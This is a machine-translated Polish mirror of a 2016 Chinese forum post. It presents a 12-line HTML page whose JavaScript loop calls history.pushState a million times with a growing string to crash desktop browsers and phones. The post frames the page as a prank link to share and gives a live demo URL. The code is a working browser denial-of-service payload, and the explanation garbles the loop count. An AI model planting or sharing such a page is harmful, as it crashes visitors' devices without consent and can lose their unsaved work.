Ten artykuł jest lustrzanym artykułem tłumaczenia maszynowego, kliknij tutaj, aby przejść do oryginalnego artykułu.

Widok: 13238|Odpowiedź: 0

[HTML/HTML5] 12 linijek kodu na stronie internetowej HTML sprawi, że komputer się zawiesi, a telefon zrestartuje w ciągu kilku minut

[Skopiuj link]
Opublikowano 22.01.2016 11:36:39 | | | |
Przyczyną incydentu jest to, że zagraniczny znajomy z Cyber Security opublikował na Twitterze taki tweet:



Ten facet twierdzi, że jeśli użyjesz powyższego 12-linijkowego kodu Javascrip{filter}t, możesz zawiesić Firefox, Chrome, przeglądarki Safari, a także spowodować restart iPhone'a i awarię telefonu z Androidem!

Pełny kod HTML przedstawia się następująco:

  1. <html>
  2. <head>
  3. <meta charset="utf-8">
  4. <title>谁点谁怀孕</title>
  5. </head>
  6.     <body>
  7. 恭喜你,你已经怀孕了!
  8. <scrip{过滤}t>
  9. var total="";
  10. for (var i=0;i<1000000;i++)
  11. {
  12.         total= total+i.toString();
  13.         history.pushState(0,0,total);
  14. }
  15. </scrip{过滤}t>
  16.     </body>
  17. </html>
Skopiuj kod


Jeśli jesteś użytkownikiem PC, po kliknięciu w link pamięć CPU komputera bardzo prawdopodobnie wzrośnie aż do momentu, gdy przeglądarka się zawiesi i zawiesza...

Jeśli jesteś użytkownikiem telefonu komórkowego (Android, iPhone), przeglądarka zawiesi się po kliknięciu w link! Kliknięcie w link na Weibo i WeChat również powoduje awarię.


Dlaczego tak się dzieje? W tym kontekście znalazłem odpowiedź od boga o imieniu "Xiaomi" na Zhihu:

history.pushstate() to API wprowadzone przez HTML5, pushState dodaje określony adres URL do historii przeglądania i przechowuje aktualny punkt historii. Gdy i<100000, suma będzie rejestrowana w historii przeglądarki w sposób cykliczny, a jeśli będzie powtarzana zbyt często, przeglądarka nie będzie w stanie tego znieść i naturalnie się zawiesi.

W każdym razie, nawet nie potrafię wymyślić "hello world", więc w ogóle tego nie rozumiem... Krótko mówiąc, to w sam raz, by wysadzić niebo!


Jeśli chcesz spróbować, kliknij tutaj:   http://www.itsvse.com/demo.html




Poprzedni:[Open Source] Wooyun Vulnerability Query Platform Source Code Plus Database asp.net Version
Następny:Konfiguracja Linuksa/konfiguracja/konfiguracja, utwór, test/sprawdzenie, sudo make in...
Zrzeczenie się:
Całe oprogramowanie, materiały programistyczne lub artykuły publikowane przez Code Farmer Network służą wyłącznie celom edukacyjnym i badawczym; Powyższe treści nie mogą być wykorzystywane do celów komercyjnych ani nielegalnych, w przeciwnym razie użytkownicy ponoszą wszelkie konsekwencje. Informacje na tej stronie pochodzą z Internetu, a spory dotyczące praw autorskich nie mają z nią nic wspólnego. Musisz całkowicie usunąć powyższą zawartość z komputera w ciągu 24 godzin od pobrania. Jeśli spodoba Ci się program, wspieraj oryginalne oprogramowanie, kup rejestrację i korzystaj z lepszych, autentycznych usług. W przypadku naruszenia praw prosimy o kontakt mailowy.

Mail To:help@itsvse.com